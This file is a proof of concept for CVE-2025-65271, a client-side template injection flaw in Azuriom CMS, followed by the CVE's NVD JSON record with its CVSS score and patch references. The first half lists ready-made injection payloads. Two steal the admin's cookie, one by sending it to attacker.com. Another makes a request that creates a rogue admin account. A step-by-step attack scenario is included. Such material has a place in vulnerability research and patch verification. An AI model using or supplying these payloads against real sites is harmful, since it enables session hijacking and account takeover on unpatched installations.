CVE-2025-65271

<!-- CVE-2025-65271 PoC - Azuriom CMS Client-Side Template Injection --> <!-- Low-privilege user injects malicious template code via plugin/dashboard component --> <!-- When admin views the page, arbitrary JavaScript executes in admin context --> <!-- Example 1: Basic XSS via template injection --> {{constructor.constructor('alert(document.cookie)')()}} <!-- Example 2: Session hijacking payload --> {{{constructor.constructor('fetch("https://attacker.com/steal?c="+document.cookie)')()}}} <!-- Example 3: Privilege escalation to admin --> {{constructor.constructor('fetch("https://attacker.com/api/admin/create",{method:"POST",body:JSON.stringify({username:"hacker",password:"P@ssw0rd",role:"admin"})})')()}} <!-- Example 4: Using AngularJS template injection (if applicable) --> {{$on.constructor('alert("CSTI")')()}} <!-- Attack scenario: --> <!-- 1. Attacker (low-privilege) injects payload into plugin setting or dashboard widget --> <!-- 2. Payload is stored and rendered when admin visits the affected page --> <!-- 3. Malicious JS executes in admin browser with admin privileges --> <!-- 4. Attacker exfiltrates admin session or performs admin actions -->

{"cve": {"id": "CVE-2025-65271", "sourceIdentifier": "[email protected]", "published": "2025-12-08T19:15:50.540", "lastModified": "2025-12-12T15:11:07.460", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Client-side template injection (CSTI) in Azuriom CMS admin dashboard allows a low-privilege user to execute arbitrary template code in the context of an administrator's session. This can occur via plugins or dashboard components that render untrusted user input, potentially enabling privilege escalation to an administrative account. Fixed in Azuriom 1.2.7."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:azuriom:azuriom:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.2.7", "matchCriteriaId": "4FA4582B-9014-408F-BEE7-3FEF69CC8667"}]}]}], "references": [{"url": "https://github.com/1337Skid/CVE-2025-65271", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/Azuriom/Azuriom", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/Azuriom/Azuriom/commit/0289175547319add814dcb526e8ba034f1ebc3ec", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://www.github.com/Azuriom/Azuriom", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.github.com/Azuriom/Azuriom/commit/0289175547319add814dcb526e8ba034f1ebc3ec", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/1337Skid/CVE-2025-65271", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Third Party Advisory"]}]}}